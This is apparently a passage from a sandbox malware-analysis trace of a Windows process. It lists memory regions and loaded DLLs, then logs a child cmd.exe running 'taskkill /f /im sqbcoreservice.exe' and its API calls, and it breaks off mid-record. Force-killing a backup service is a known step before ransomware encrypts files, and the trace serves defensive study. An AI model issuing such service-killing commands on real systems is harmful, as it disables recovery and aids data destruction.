3938 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3939 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3940 start_va = 0x4130000 end_va = 0x416ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004130000" filename = "" Region: id = 3941 start_va = 0x4180000 end_va = 0x41bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004180000" filename = "" Region: id = 3942 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3943 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3944 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3945 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3946 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3947 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3948 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3949 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 3950 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3951 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 3952 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 3953 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3954 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3955 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 3956 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 3957 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 3958 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 3959 start_va = 0x4680000 end_va = 0x477ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004680000" filename = "" Region: id = 3960 start_va = 0x41c0000 end_va = 0x41e9fff monitored = 0 entry_point = 0x41c5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3961 start_va = 0x4780000 end_va = 0x4907fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004780000" filename = "" Region: id = 3962 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3963 start_va = 0x4910000 end_va = 0x4a90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004910000" filename = "" Region: id = 3964 start_va = 0x4aa0000 end_va = 0x5e9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004aa0000" filename = "" Region: id = 3965 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3966 start_va = 0x41c0000 end_va = 0x41c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041c0000" filename = "" Region: id = 3967 start_va = 0x41d0000 end_va = 0x41d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 3968 start_va = 0x41e0000 end_va = 0x41e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 3969 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 3970 start_va = 0x5ea0000 end_va = 0x61d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3971 start_va = 0x4680000 end_va = 0x4769fff monitored = 0 entry_point = 0x46bd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3972 start_va = 0x4770000 end_va = 0x477ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004770000" filename = "" Region: id = 3973 start_va = 0x44c0000 end_va = 0x44c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 3974 start_va = 0x4680000 end_va = 0x475ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 3975 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3976 start_va = 0x44d0000 end_va = 0x44d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044d0000" filename = "" Region: id = 3977 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 3978 start_va = 0x44e0000 end_va = 0x44e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044e0000" filename = "" Region: id = 3979 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 3980 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 3981 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 3982 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 3983 start_va = 0x44f0000 end_va = 0x452ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 3984 start_va = 0x4530000 end_va = 0x456ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004530000" filename = "" Region: id = 3985 start_va = 0x61e0000 end_va = 0x621ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061e0000" filename = "" Region: id = 3986 start_va = 0x6220000 end_va = 0x625ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006220000" filename = "" Region: id = 3987 start_va = 0x6260000 end_va = 0x629ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006260000" filename = "" Region: id = 3988 start_va = 0x62a0000 end_va = 0x62dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062a0000" filename = "" Region: id = 3989 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 3990 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 3992 start_va = 0x4570000 end_va = 0x4575fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004570000" filename = "" Thread: id = 281 os_tid = 0x57c Thread: id = 282 os_tid = 0x690 Thread: id = 283 os_tid = 0x66c Thread: id = 284 os_tid = 0x648 Thread: id = 285 os_tid = 0x768 Process: id = "54" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2f50f000" os_pid = "0xd98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im sqbcoreservice.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3994 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3995 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3996 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3997 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3998 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3999 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4000 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4001 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4002 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4003 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 4004 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 4005 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4006 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4007 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4008 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4009 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 4010 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4011 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 4012 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 4013 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4014 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4015 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4016 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4017 start_va = 0x4a0000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 4018 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4019 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4020 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4021 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4022 start_va = 0x4a0000 end_va = 0x55dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4023 start_va = 0x640000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 4024 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4025 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4026 start_va = 0x740000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 4027 start_va = 0x1d0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4028 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4029 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4030 start_va = 0x840000 end_va = 0xb76fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 286 os_tid = 0x12c8 [0202.808] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0202.808] __set_app_type (_Type=0x1) [0202.808] __p__fmode () returned 0x74974d6c [0202.808] __p__commode () returned 0x74975b1c [0202.808] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0202.808] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0202.810] GetCurrentThreadId () returned 0x12c8 [0202.810] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x12c8) returned 0x78 [0202.811] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0202.811] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0202.811] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.817] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.817] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0202.817] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.817] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0202.817] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0202.817] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.817] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0202.817] GetConsoleOutputCP () returned 0x1b5 [0202.818] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0202.818] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0202.819] _get_osfhandle (_FileHandle=1) returned 0x130 [0202.819] SetConsoleMode (hConsoleHandle=0x130, dwMode=0x0) returned 0 [0202.819] _get_osfhandle (_FileHandle=1) returned 0x130 [0202.819] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0202.819] _get_osfhandle (_FileHandle=0) returned 0x158 [0202.819] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0202.819] GetEnvironmentStringsW () returned 0x647f20* [0202.819] GetProcessHeap () returned 0x640000 [0202.819] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0xa1a) returned 0x648948 [0202.819] FreeEnvironmentStringsA (penv="A") returned 1 [0202.819] GetProcessHeap () returned 0x640000 [0202.819] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x4) returned 0x642738 [0202.819] GetEnvironmentStringsW () returned 0x647f20* [0202.819] GetProcessHeap () returned 0x640000 [0202.819] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0xa1a) returned 0x649370 [0202.819] FreeEnvironmentStringsA (penv="A") returned 1 [0202.819] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0202.820] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0202.820] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0202.820] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0202.820] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0202.820] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0202.820] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0202.820] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0202.820] RegCloseKey (hKey=0x88) returned 0x0 [0202.820] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0202.820] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0202.820] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0202.820] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0202.820] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0202.821] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0202.821] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0202.821] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0202.821] RegCloseKey (hKey=0x88) returned 0x0 [0202.821] time (in: timer=0x0 | out: timer=0x0) returned 0x62344239 [0202.821] srand (_Seed=0x62344239) [0202.821] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im sqbcoreservice.exe \"" [0202.821] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im sqbcoreservice.exe \"" [0202.821] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0202.821] GetProcessHeap () returned 0x640000 [0202.821] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x210) returned 0x647088 [0202.821] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x647090, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: 